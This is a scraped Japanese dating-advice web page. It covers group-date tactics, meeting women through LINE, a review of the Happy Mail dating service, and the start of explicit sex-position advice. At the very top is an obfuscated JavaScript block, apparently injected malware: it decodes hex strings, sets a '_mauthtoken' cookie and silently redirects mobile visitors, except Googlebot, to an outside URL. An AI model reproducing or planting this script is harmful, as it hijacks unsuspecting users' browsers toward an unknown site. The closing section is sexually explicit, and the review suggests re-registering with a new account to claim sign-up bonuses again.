-1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

合コンで好みの女性を彼女に出来てしまう3つのテクニック

合コンの時に自分の好みの女性がいるのに、どうしたら良いか分からない、と思ったことがあるかと思いますが、そんな中々恋愛が上手くいかない人に参考になる、好みの女性を彼女にするための3つのテクニックを紹介したいと思います。

出会う前に意識した方が良いこと


出会いに行くときの意識

まずは、根本的なことですが女性と出会えなければ、彼女を作ることは絶対に出来ません。

出会いは自分で作るものですので、家と職場の往復だけではなく、合コンに行くときには会ったことのない女性と出会いに行くんだ、という意識を持って行くようにしてください。

また、合コンや女性と出会う場に積極的に出掛けていって、女性と会う機会を増やしてください。

外見が大切

外見というと顔だと思う人がいますが、顔ではなくここで言う外見とは、髪型や眉毛、髭、爪、服装、持ち物など自分次第で今すぐにでも変化させられる所のことです。

外見を変化させようと思ったときに大事なことは、自分の考えを捨ててモテている人の意見を取り入れるようにしてください。

そうすることによって、モテない人がモテる人になることが出来ます。

髪型は寝癖とかを直し自分に合った髪型に整えたり、髭を剃って清潔感のある感じに整えたりすることによって、最初の印象をよくすることが出来ます。

出来るなら幹事をすること

幹事をするメリットとしては、他の男性よりも立場が優位であることと、自動的に参加した女性全員の連絡先をもらうことが出来るというこの2つがあります。

他の男性よりも立場が上でスタート出来るのは、良いことですし、幹事をすることによって女性との会話をする機会が必然的に増えますので、女性との経験が少ない人や、関係作りに自信がない人は是非幹事をしてみることをおすすめしたいと思います。

飲み会で必ずやった方が良い行動

席の配置をする

飲み屋に行ってみると、合コンをやっているグループをよく見かけますが、盛り上がっているグループと盛り上がっていないグループがありますが、そこには席の配置という共通点があります。

盛り上がっていないグループは、男女が対面形式で座り、何かの集団面接みたいに座っていますので、場が緊張してしまって盛り上がりません。

盛り上がっているグループは、男女が交互に座って隣通しになることによって、仲良くなりやすくなりますので、盛り上がりやすくなります。

交互に座るのは鉄則中の鉄則ですから、必ず男性は女性より早く飲み会場所に到着するようにして、あらかじめ交互になるように座っておくようにしてください。

あとは、男性の幹事が空いている場所に女性を座らせることをするのとしないのとでは、女性との仲良くなれる度合いが全然違ってきますので、必ずやるようにしてください。

お互いに呼び名を決めること

席も決まってようやく女性との会話をスタートさせますが、会話の始まりとしてはやはり名前を聞くと思いますが、そこで絶対にやって欲しいのが呼び名を決めて欲しいです。

しかし呼び名は必ず名前が絡んだものか、または普段呼び慣れていないものか、相手が呼んで欲しいあだ名にしてください。

例えばですが、友達とかには何て呼ばれているの?とか何て呼んで欲しい?などと聞いてみると、女性は答えてくれますので、それから決めることが出来ます。

もしも、上記に書いたように聞いて何も出てこなかった場合は、名前が絡むあだ名を付けて呼び、呼び名が決まったならばあとはその呼び名を連呼するようにしてください。

例えば○ちゃん、何かのむ?とか○ちゃん、仕事なにしてるの?という感じで、必ず呼び名を言ってから会話をするようにしてください。

なぜなら普段呼び名を連呼されることはありませんので、非日常を演出することが出来るからです。

非日常、つまりはいつもと何か違うという感覚にさせることによって、あなたを魅力的にさせてくれますので、是非やってみてください。

相手の女性に興味を持つこと

呼び名を決めることによって、ようやく会話をする準備が整いましたが、どんな会話をすれば良いのか?、話すの苦手なんかは全然関係なく、話すのは相手の女性が勝手にしてくれますので、あなたは質問をしてください。

目の前の相手の女性に興味を持ち、相手がどんな人間か知ろうとする気持ちで接し、相手の好きな食べ物や趣味など何でも良いので、質問をして相手のことを引き出してください。

比率としては、相手の女性が7割、自分が3割で話すようにしてください。

また、相手の話を聞きながら、相づちをうったり、ジェスチャーをしたりするなどして、相手が話しやすい雰囲気を作ってあげてください。

二次会はしないこと

経験上二次会はグダグダになることが多いので、もう少し話したかったなというくらいの、少しの余韻を相手に持たせるくらいがちょうど良いので、一次会が終わったら速やかに撤退するようにしてください。

特にあなたが幹事の立場なら、今日はこれで終わりですので、二次会は各自でするようにお願いします。ありがとうございました。と爽やかに切り上げることによって、二次会でグダグダして時間とお金と、あなたに対する評価を無駄に下げることがないので、次に繋げることが出来ます。

飲み会が終わったら二人で会うために送ることの出来るLINEの内容



まずは来てくれたことを感謝し、あまり話すことが出来なかったので、もしよかったらまた食事にでも行きませんか?と送ると、大体こちらこそありがとうございました。是非行きましょうと、返事が返ってきます。

そうしたら、自分の空いている時間と場所を言い、相手に聞く返事をすることで、気がある女性であれば誘いに乗ってきますが、逆に誘いに乗ってこない女性は、興味がないことを知ることが出来ます。

下手にLINEを打つ回数を増やすのではなく、またあなたに興味がない人と無駄なやり取りをすることもなく、簡単に食事の約束を取ることが出来ますので、是非試してみてください。

まとめ

上記で合コンで好みの女性を、彼女にするための3つのテクニックを紹介しましたが、効果は抜群ですので合コンで良い女性を彼女にしたいと思っているなら、是非実践して彼女に出来るように頑張ってください。

【彼女欲しい人必見!】LINEで彼女を作る方法教えます!

LINEの日本での利用者数は、5800万人とも言われていて今や日常のコミュニケーションに、必要不可欠なアプリとなっていますが、実はLINEを利用して出会うことが出来ますが、注意すべきポイントが沢山ありますので、その辺りにも触れながらLINEで出会う方法を紹介したいと思います。

LINEで出会うためには何をする必要があるのか?



誰でも手軽に使うことが出来、可愛いスタンプもあるので、今や連絡を取る手段として日常的に使われていますが、ID検索機能を使うことによって出会いのアイテムとして使うことも出来ます。

日常的に使っている人も多いので、出会える人は多種多様で主に恋愛目的で出会うことになりますが、一部ビジネスなどにも利用されているみたいです。

LINEを使って、どのように出会う方法があるのかを紹介したいと思いますので、興味のある人は見てみてください。

LINEで出会う前に注意した方が良いこと

LINEで出会うことは意外に簡単に気軽に出来ますが、その手軽さゆえに犯罪なども起きているので、実際に出会う前にLINEで出会う時の注意点を押さえたいと思いますので、実際に出会う前に必ず確認をするようにぜひしてください。

無視されることは当たり前

LINEで出会う時にはアプリや掲示板を利用することになりますが、暇潰しのつもりでやっている人が大半ですので、少し話が合わなかったりプロフィール写真が好みでなかったりする場合は、すぐに無視されるケースが非常に多いみたいです。

全てのやり取りに真面目に回答して、無視されてそのたびにへこんでしまっていては、出会うことがなかなか出来ませんので、数を打てばいつかは当たるということではありませんが、無視された場合は気持ちを切り替えて次に進むようにしましょう。

サクラや業者、犯罪行為などをしないように気をつける

気軽に出会えるアプリや掲示板には犯罪行為はつきもので、LINEで盛り上がって実際に会ってみたら、未成年だったとかマルチ商法に勧誘されたとか宗教に誘われたなどのトラブルが途絶えません。

LINEでの会話のやり取りでは、このようなことを見抜くのは難しいのですが、予防策としては出来るだけ会う前に、相手の身分を確認することや、勧誘をされそうになったら意志を持って断るようにするなど、自分の身は自分で守るようにし、しっかりと自分の意志を持って対応するようにしてください。

LINEを出会いの場として使う方法は?



LINEで出会う方法として挙げられるのが、LINEのIDを利用して近くのLINEユーザーに出会うという、アプリや掲示板を利用して、その中でLINEのIDを交換して実際にLINEのやり取りを開始することで、最終的に出会うことを目的としています。

顔写真が必要なものから、IDのみ載せるものまで様々なものがありますから、自分にあったアプリや掲示板を探してみることが出来ます。

年齢や地域を設定したり、年齢や性別、地域など相手を絞りこんだりすることが出来たり、LINEやカカオトークのIDを無料掲示板に投稿することで、LINEでのやり取りをすることが出来るので、自分が会いたいと思う相手に会える可能性が高まります。

18歳未満は禁止となってはいますが、実際は18歳未満の女性が使っている場合もあるみたいですので、犯罪行為にはくれぐれも注意してください。

手っ取り早く出会い用のアプリを使うこと

LINEは連絡先の代わりになるものですので、こだわる必要はなく、検索するとLINE専用の出会い系や、ただの出会い系アプリなどがありますので、使って仲良くなったらLINEを交換することが出来ます。

気に入った女性を見つけたらコンタクトを取って、軽い感じで話を続けていけば、彼女に出来る可能性が出てきます。

LINE出会い掲示板の危険性は?


男性の方がつられやすい

出会い系は男女問わず利用出来ますが、匿名なのを良いことに悪質な詐欺サイトへ誘導するサクラと言われる人が多数登録していて、試しに1度登録してみると、何もアクションを起こしていないのに、女性から同じ地域や共通の趣味があるだけの理由で、コンタクトを取ってきますが、女性の接し方を心得ている男性なら分かると思いますが、実際にはそんなことはあり得ません。

コンタクトを取ってくる女性に限って、美人の画像を使ってあの手この手で初心者を釣って来ようとしますが、しかし、余程イケメンで恵まれた環境で無い限り、あり得ないと思った方がいいと思います。

公のLINE掲示板は自分だけのものではないこと

例えばですが、どこかの公のLINE掲示板を使ったとして、女性と仲よくなったとします。

そこで、LINEIDを交換しようと思い掲示板に書き込んでしまうと、その掲示板は自分だけのものではないので、仲良くなりたい相手が見るだけならまだしも他の人からも見られる可能性があることを、覚えておいてください。

例え個人情報が詳細に分からないLINEIDであったとしても、不特定多数に知られることはとてもリスクが高く、人は見えないことや知らないことに不安を感じてしまいます。

もしも悪質な業者にIDを知られてしまって、一斉に友達追加が来ることを考えると、来たところで承諾しなければ良いだけなのですが、非常に不安を感じてしまいますが、それが実際に頻繁に起きてしまっています。

一人に教えると誰かに教えることが出来てしまいますので、悪質な業者から悪質な業者へ渡ってしまいますと、もう拡散が止まることはありませんので、そんな恐ろしいことにもなりかねないこと、他人事ではないことを肝に命じて使うようにしてください。

詐欺サイトへの誘導に注意


出会い系と同じようにLINEで出会った人と、仲良くなったと思いきや、連絡は今度からこのサイトでして欲しいなどと言われて、リンク先に接続してみるとワンクリック詐欺で、多額の登録料を請求されたり、LINEのIDとパスワードを引っこ抜かれたりします
が、ワンクリックは気にせず無視するだけで済みますが、パスワードが分かってしまうとアカウントが乗っ取られたり、最悪の場合友達にも被害が出てしまいかねません。

最近では手の込んだ誘導も多いみたいで、思わず押してしまうこともあるみたいですので、LINE内でコミュニケーションがとれているのに、他のサイトに誘導する意味が分からないので、怪しいと思ったら押さないようにし、もしも相手から何の連絡がなくても、LINEだけの繋がりが切れただけですので、また探してください。

悪質な業者を見極めるためのポイント

IDをひたすら交換したがる

最初はひたすらIDを交換したがる人、男性も女性も同じで相手のことを知らないのに会いたいと思う気持ちなんて湧きませんから、本当に出会いたいと思うならじっくりと事を焦らずに、仲を育んでください。

ひたすら出会いを求める人の多くは、卑猥な目的で接しようとする人か詐欺か、体目的のみの交友関係もあるみたいです。

顔写真を見せてくる人

女性であれば何も言っていないのに、美人な顔写真や体の性的な部分の写真を送りつけてきますが、一般的な女性であればそんなことはしませんので、くれぐれも注意してください。

やたらと沢山質問をしてくる人

相手のことを知って探ろうと、質問で話を返してきて悪質な業者であれば確実に釣れそうな人を選んで来ますので、もしも可能性がありそうだと思われたら、何としてでも釣ってやると猛アタックをしてきますので、取り合わないようにしてください。

下ネタや暴言を言う人

男女共に仲良くなったならともかく、下ネタや人に対する暴言も気持ちの良いものではありませんので、ましてや愚痴聞き役ではないので、嫌だと思うなら相手にしないようにしてください。

注意点


怪しいと思った人は即遮断
し、LINEIDは検索されないようにしておいてください。

もしも、出会い掲示板にQRコードを載せてしまったなら、LINEからQRコードを更新することによって、以前のQRコードが使えないように出来ます。

LINEのプロフィール欄の画像やステータスメッセージには、個人情報が分かるものは書かないようにし、写真は動物や風景など、関係の無いものにしてください。

まとめ

LINEは正しく使えば便利なコミュニケーションツールで、使って仲良くなりカップルになって結婚した人もいますが、それ以上に騙される人の方が多いので、早々に良い出会いはないこと、急いで育むものではないと銘記して自己防衛をしっかりとし、LINEで彼女を作ることが出来るように頑張ってください。

ハッピーメールで本当に出会えるか10万ぶち込んで検証しました!

出会い系のハッピーメールとは、一体何なのか?、本当に業者ではなく、素人で可愛い女性と出会うことが出来るのか?、1度は疑問に思ったり、疑ったりしたことがあると思います。

出会い系のハッピーメールで、本当に出会えることが出来るのか、検証と感想をお伝えしたいと思います。

多くの口コミサイトを見てみると、ハッピーメールについて優良の出会い系サイト!と、誰が書いたのか分からない、良いことしか書いていないサイトなどが、沢山あります。

これを読めばハッピーメールは、優良サイトなのか?、それとも詐欺サイトなのか?、ハッピーメールとは何なのか?、全て判明すると思いますのでぜひ参考にしてして頂けるとありがたいです。

ハッピーメールとは?



所在地は福岡で、累計会員数が1600万人で、実は日本最大級の登録者数で、会員数をまだ増やしていて、規模が大きく運営年数が17年と長いです。

また、完全に匿名で24時間365日体制のサポート・監視を行っていて、通報機能も完備し登録に必要な時間も30秒程度と短くて簡単に出来ます。

ハッピーメールの機能を使う前に、必ず年齢確認と電話番号認証が必須になっているので、安心です。

ハッピーメールの評判と口コミ

気になる老舗でユーザー数も1600万人と多い、ハッピーメールの口コミや評判を、ネット上で見てみたいと思います。

まずは、Googleアプリのレビュー評価を見てみたいと思います。

すると星が5個中3.4個で、アプリのレビューでは、ハッピーメールは星が3.4個以上をつけた人が、1116人という高評価です。

運営会社がサイト内で、高評価を付けるように嘆願していないので、この評価は純粋にユーザーが付けたと思われます。

悪い口コミや評判がないか探してみました。

2万要求してくるのは、全員サクラか業者だからこのアプリにはサクラしかいないし、詐欺だと書いている人や、40代以上は返事がなく1人だけ返事が来たと思ったら割りきりで、会う約束をしたけどすっぽかしたが、返事をした人は実在しないかサクラばっかり、ダメなアプリ、売春の女性しかいない、と書いている人もいました。

良い口コミの裏には、悪い口コミや評判が出てきますが、次は会社が信用出来るかを見たいと思います。

運営会社は信頼出来るのか?



ハッピーメールの運営会社である、株式会社アイベックはインターネットサービスだけでなく、不動産やソーラーパネルなどの事業を行い、今年で設立35年が経つ大手の企業ですので、ホームページを見ても信頼出来る会社だと思います。

出会い系の中では一番安全性が高い

ハッピーメールは、年齢確認をしなければ機能が使えず、電話番号を登録するので多重登録をすることが出来ないので、セキュリティが安全です。

ですから、1度退会させられたマナーの悪いユーザーや、変な業者が紛れ込みにくいこと、また業者をすぐに排除する24時間稼働のサポートセンターがあり、少しでも変な動きをしたユーザーがいた場合、メールをスタッフが監視していますので、怪しいユーザーをすぐ強制退会させてくれるので、安心です。

他の出会い系アプリより厳しくて、もしも最初から2万円をくれれば継続的なセフレになるよ、という素人のフリをした割り切り目的の出会い系を利用して、デリヘルの営業をしている業者がいた場合、通報すると大体10分以内に強制退会させてくれます。

常に運営側が巡回していて、会員が通報すれば一発で退会させてくれますが、他の出会い系サイトは怪しいユーザーや明らかに業者っぽい動きをしていても、通報をしても強制退会させてくれません。

ハッピーメールは、2009年に出会い系サイト規制法が出来た頃から、トップレベルの会員数を誇るので警察からの指導もあるのかもしれません。

また、ハッピーメールは警視庁にインターネット異性紹介事業を、そして総務省に第二種電気通信事業者の届け出をちゃんと提出した上で、運営しています。

ハッピーメールは無料ではなく、有料だけどコストが安い



掲示板・日記・プロフィール検索、メールを受信・閲覧、足跡経由のプロフィール閲覧は無料ででき、掲示板閲覧といいね!送信は1P(10円)、プロフィール画像閲覧は2P(20円)、メール画像/動画添付は3P(30円)、メール送信は5P(50円)、他にも何か行動しようとすると課金しないと出来ませんが、せいぜい使うのは上に書いたような行為で、他の出会い系よりも安いです。

月3000円あれば、出会えている人もいます。

ちなみに、悪質な出会い系サイトはメール送信をするたびに500円かかるとか、異常な高額料金の所もありますが、何処よりも良心的で財布に優しい料金設定になっています。

キャッシュバッカーがいない

キャッシュバッカーとは、ポイント稼ぎを目的に出会える系の、出会い系サイトに登録している女性のことで、女性はメールレディやメールの送受信でコツコツ稼げる、副業をすることが出来ます。

メールレディをしても時給60円で、電話で話すテレフォンレディなら稼げそうですが、それでも時給1200円なので労力は半端なくかかりますし、常に出来る訳ではなく電話する男性がいなければ、仕事が出来ませんので、ハッピーメールでは稼ぐことが出来ません。

出会いたくなくて稼ぎたい女性は、違う出会い系サイトの方が高く、他のサイトなら1時間3000円稼ぐことが出来る所もあります。

例えば男性とメールのやり取りをするだけで、1通100円稼げる出会い系があるとすれば、女性が稼ぐために必死でメールを送ってきますし、会う約束をしてくれずにダラダラと会話を長引かされますので、気付いたら数千円~数万円課金させられて音信不通になり、終わってしまうことになりかねません。

ですから、ハッピーメールはキャッシュバッカーがいないと見て間違いないと思います。

他社の出会い系サイトよりも、ポイントを無料で貰える方法が多くある



このハッピーメールは料金が安いこともありますが、実は初回登録時やメールアドレスの登録、毎日ログインするなど様々なことをするだけで、ポイントを稼ぐことが出来ます。

つまり課金をしないで無料で、若くて綺麗な女性と出会える出会い系ですので、無料で使える方法を紹介したいと思います。

上手な人なら一切課金しないで出会えると思いますので、参考にしてしてみてください。

初回の無料登録時に年齢確認をして、100Pをもらう

初回登録では、2017年現在だと100Pもらえますが、100Pは金額にしますと1Pが10円ですので、1000円分のポイントです。

100Pが最初からもらえるのは大きく、これだけで出会い系経験者や上手な人であれば、無料で出会うことが出来ると思います。

そしてポイントがもらえるのは、100Pだけだと多くの人は思っていますが、実は100Pだけではありません。

最初の正規の登録方法で、あと20Pもらえます。

メールアドレスも登録して、年齢確認をした時に合計120P
もらえます。

メールアドレスは、gmailやYahoo!メールなどのフリーメールでも大丈夫です。

最初に無料登録するともらえるだけではなくて、ハッピーメールに登録した後も、ポイントがもらえますので、その方法を紹介したいと思います。

ハッピーメールから送られてくる、サービスチケットという出会う効率が加速する特典があるのですが、これはポイントがもらえる訳ではなく、月3回分メールの送信が無料になるというサービスです。

もしあなたが掲示板や日記、写真などで発見した気になる女性がいるなら、メールを送ることが出来ますが、どうせ無料だからと気軽に送信するのに、使うことが出来ます。

しかしこのサービスチケットは、1週間経過してしまうと消滅してしまいますので、サービスチケットが来たらすぐに使えるようにメールをチェックし、いつでも見込みの相手を持っているようにしてください。

また迷惑メールに振り分けられたり、受信しても開かずに削除したりすると損をしてしまいますので、各種設定でメール通知が来るように設定しておいてください。

ハッピーメールに登録後プロフィールを入力し、50%埋めると10P、100%まで埋めると20P(200円)もらうことが出来ます。

プロフィールに何を書けば良いかというと、ニックネーム、年齢、身長、スタイル、ルックス、プロフィールの画像、録音した音声、動画、職業、住んでいる場所、年収、独身か恋人がいるか、子供がいるか、たばこを吸うのか、お酒を飲むのか、車があるのか、血液型、星座、一口コメント、興味があること、自己評価、希望の相手とこんなに埋めなければいけないのかと、思われるかもしれませんが写真と録音と動画と、一口コメントは時間がかかるかもしれませんが、それ以外はすぐ埋めることが出来ます。

プロフィールを最低でも、90%まで絶対に埋めてください。

出会い系全てに共通しますが、出会う秘訣はプロフィールを出来るだけ埋めて充実させることによって、出会いやすくなります。

プロフィールについて注意することは、ハッピーメールを過去に退会した人だとポイントはもらえませんので、退会履歴が無い新しいFacebookアカウントなどで登録し直してください。

ハッピーメールで出会えない



ハッピーメールで女性と出会えない人は、多くの人がプロフィールの書き方が下手ですので、女性にどうしたらいい人に思ってもらえるかを考えて、プロフィールを作ってください。

最初のメッセージが一番大事ですので、相手の女性のプロフィールを読んで、一人一人メッセージを送るようにし、相手の女性が返信しやすいようにしてください。

良いタイミングでLINEIDやメールアドレスを聞いてください。

口実は「このサイト、メッセージするごとにお金がかかるから」、と言うと男性のことを考えている女性だったら、普通にLINEIDやメールアドレスを教えてくれると思いますが、教えてくれないのであれば早いうちに切ってください。

自分でハッピーメールを使ってみた実際の体験

最初にもらうことが出来たポイントの120ポイント、メールアドレス登録の20ポイント、プロフィール登録の20ポイントだけで女性と出会うことが出来るのか、最初は自信がなくて不安でした。

まずは、メールを一斉に送信したので、ポイントが30ポイント代に減りましたが、メールへの反応があり、無料で出会えそうな女性とやり取りを始めました。

中々可愛い女性で、年齢は19歳で女子大生とやり取りを始めました。

初めまして、と挨拶し住所を言ってメッセージ交換をしてくれるかお願いしたところ、是非お願いしますと来ましたので、メッセージのやり取りを始めました。

プロフィールを見てそのことを伝え、どんなことをしたくてハッピーメールをしているのか、教えてもらい会う段取りをしました。

日にちや場所、時間をやり取りの中で決め、待ち合わせ場所、服装を決めて相手に伝えて無事に会うアポイントを取れました。

ポイントは1通メールを送るごとに、5ポイント消費しますが、7通メールを送ったのでポイントがなくなってしまいました。

ここまでのやり取りにかかった期間は、最初の1通目のやり取りから一週間で、1日1往復のメール頻度でしてました。

他の女性に行くには、お金を課金しなければいけないので、この女性に賭けてみることにし、最初に会うことになりましたが、顔合わせということで会うことになりました。

業者であればすぐホテルに行こうとか、2万円最初くださいと言ってきますが、それを言われないことを信頼して会ってみました。

すると、19歳の女性は写真と同じ顔で、一緒に喫茶店で顔合わせをしたときに、免許証を見せてもらったら女子大生で、こんな普通の女子大生がハッピーメールにいることも驚きですが、実際世の中が考えている以上に誰しも出会いたいという欲求は強いみたいです。

まとめ

出会い系経験者や上手な人であれば、課金をせず無料で女性と出会うことが出来ますが、月3000円で出会えている人もいます。

10万もあれば、絶対に素敵な女性と会うことが出来るはずです。

上記の紹介したことを参考にして、ぜひ女性と出会うことが出来るように頑張ってください。

バック(後背位)で女性をイカせまくる方法と注意点

バックとはその名の通り、女性の後ろからペニスを挿入する体位です。

後ろから突く姿勢から、男性は征服感を感じることができると高い支持を得ています。

AVなどで、激しく突いている姿に思わず興奮してしまったという経験ある人もいるのではないでしょうか?

SEXで頻繁に取り入れるには、相手の女性にもバックを好きになってもらわなくてはなりません。

そこで今回は、バックで女性をイカせる方法や
注意点をご紹介したいと思います。

Gスポットを刺激する


Gスポットは、膣の手前側にある性感帯で、膣の上部に位置しています。

ペニスを挿入したら、膣壁の上に沿うようにピストン運動をしてください。

最初はゆっくりと動かして、女性の反応を見て少しずつ早めていきます。

Gスポットは手前にあるので、浅めの挿入でOKです。

角度によっては、正常位よりもGスポットにあたりやすく、女性をイカせやすい体位でもあります。

ですから、角度を調整してGスポットにあたりやすい角度を見つけてみてください。

クリトリスを同時に責める

Gスポット同様、クリトリスも女性の性感帯の1つです。

クリトリスを刺激されることで、快感と感じる女性は多い傾向にあります。

ですからバックで挿入しながら、指でクリトリスも一緒に刺激してみましょう。

